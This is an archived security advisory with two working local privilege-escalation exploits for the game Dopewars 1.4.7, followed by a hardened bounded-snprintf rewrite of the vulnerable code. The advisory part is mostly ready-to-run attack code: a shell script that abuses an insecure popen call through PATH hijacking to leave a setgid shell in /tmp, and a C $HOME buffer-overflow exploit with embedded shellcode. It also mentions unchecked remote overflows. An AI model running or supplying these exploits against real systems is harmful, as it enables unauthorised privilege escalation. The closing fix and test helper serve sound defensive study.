2dopewars_exploits.txt

Date: 26 Jun 2000
Reported by: vade79
Type: packetstorm
Source: packetstormsecurity.com

Local vulnerabilities found in Dopewars 1.4.7: insecure popen call and buffer overflow issues.

Code
```text
two security holes i found for local use in dopewars(1.4.7-current). dopewars
is setgid=games. by: Vade79->v9[[email protected]].


LOCAL VULNERABILITY #1: insecure popen call, a shell script can handle this.

-- dopewars.sh start --

#!/bin/sh
# dopewars.sh(1.4.7): shell script by Vade79->[email protected]. gives gid=games.
# insecure use of a popen call while setgid isn't good in any situation.

DOPEWARS=`which dopewars`
if [ "$DOPEWARS" ];
then echo "[*] dopewars binary found: $DOPEWARS."
else echo "[!] dopewars binary was not found, aborted.";exit
fi
CHECK=`ls -l $DOPEWARS | grep sr-`
if [ "$CHECK" ];
then echo "[*] dopewars found to be setgid, proceeding."
else echo "[!] dopewars NOT found to be setgid, aborted.";exit
fi
PATH=/tmp:$PATH
cp /bin/sh /tmp/gidsh
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c
cc /tmp/more.c -o /tmp/more
cat <<X>/tmp/dopecmds
help
quit
X
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1
rm -f /tmp/more* /tmp/dopecmds
CHECK=`ls -l /tmp/gidsh | grep sr-`
if [ "$CHECK" ];
then echo "[*] success, setgid shell is in: /tmp/gidsh."
else echo "[!] failed, the setgid shell doesn't exist."
fi

-- dopewars.sh end --


LOCAL VULNERABILITY #2: $HOME buffer overflow in versions 1.4.3-7(current).

-- dopewars_bof.c start --

/* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[[email protected]].
dopewars is SGID(=2755)=games by install(make install). this overflow is
true for versions of dopewars 1.4.3 to 1.4.7(current).

syntax: ./dopewars_bof [offset] [alignment(0-3)]
./dopewars_bof -200 1

the basic overflow(dopewars.c):
--
pt=getenv("HOME");
if (!pt) return;
if (strlen(pt) > 770) {
sprintf(ConfigFile,"Home directory %s too long.",pt);
ReportError(ConfigFile);
return;
}
sprintf(ConfigFile,"%s/.dopewars",pt);
--
"the home directory is too long! so what? lets continue anyways."

note: even in the current version of dopewars(1.4.7) there appear to be some
remote overflow possibilities from server->client(bof the client with
a bogus server). you can even overflow the server just by simply
sending a large string(eip=0x0..). i am just making a note of lots of
unchecked buffers. also, $HOME is too common an overflow for this to
occur. :) */

#define PATH "/usr/local/bin/dopewars" // path to the dopewars program.
#define GID 20 // group id of games.
#define DEFAULT_OFFSET 200 // if no argument #1.
#define DEFAULT_ALIGN 1 // if no argument #2.

static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // soon to be gid=games.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[800];
int i,offset,align;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
ret=(esp()-offset);
printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);
exec[10]=GID;
for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
setenv("HOME",bof,1);
if(execlp(PATH,"dopewars",0)){
printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);
exit(-1);
}
}

-- dopewars_bof.c end --

Vade79 -> [email protected] -> www.fakehalo.org.
```
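The quoted `dopewars.c` fragment checks that `$HOME` is no longer than 770 bytes, but the error path then copies the oversized value into the same fixed buffer with an unbounded `sprintf()` before returning, which is the write the exploit above reaches. The following is an added example, not code from the advisory or from dopewars, showing the same logic with bounded formatting; the buffer size `CONFIG_LEN` is an assumption, and `try_home_len()` is a hypothetical helper that exercises the handler on constructed `HOME` values.

```c
#include <stdio.h>
#include <string.h>

#define CONFIG_LEN 800   /* assumed size of ConfigFile in the original */
#define HOME_MAX   770   /* limit taken from the advisory's quoted check */

/* Hardened replacement for the quoted fragment.
 * Returns 0 on success, -1 if home is NULL, -2 if home is too long.
 * Never writes more than cfg_len bytes (terminator included). */
int build_config_path(const char *home, char *cfg, size_t cfg_len)
{
    if (!home)
        return -1;
    if (strlen(home) > HOME_MAX) {
        /* Original: sprintf(ConfigFile,"Home directory %s too long.",pt);
         * The attacker-controlled string is echoed into a fixed buffer
         * with no bound. Here the length is reported instead of the value,
         * and snprintf() caps the write at cfg_len. */
        snprintf(cfg, cfg_len, "Home directory too long (%zu bytes, limit %d).",
                 strlen(home), HOME_MAX);
        return -2;
    }
    /* 770 + strlen("/.dopewars") = 780 < CONFIG_LEN, and snprintf()
     * still bounds the write if CONFIG_LEN were ever reduced. */
    snprintf(cfg, cfg_len, "%s/.dopewars", home);
    return 0;
}

/* Hypothetical test helper: builds a constructed HOME of n 'A' bytes, runs
 * the handler, and returns its code (-3 if n is out of range for the test
 * buffer, -4 if the output somehow filled the whole config buffer). */
int try_home_len(size_t n)
{
    char home[2048];
    char cfg[CONFIG_LEN];
    if (n >= sizeof home)
        return -3;
    memset(home, 'A', n);
    home[n] = '\0';
    int rc = build_config_path(home, cfg, sizeof cfg);
    if (strlen(cfg) >= sizeof cfg)
        return -4;
    return rc;
}

int main(void)
{
    /* 800 bytes is the size the exploit above places in HOME. */
    printf("HOME of 11 bytes  -> rc %d\n", try_home_len(11));
    printf("HOME of 770 bytes -> rc %d\n", try_home_len(770));
    printf("HOME of 800 bytes -> rc %d\n", try_home_len(800));
    return 0;
}
```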
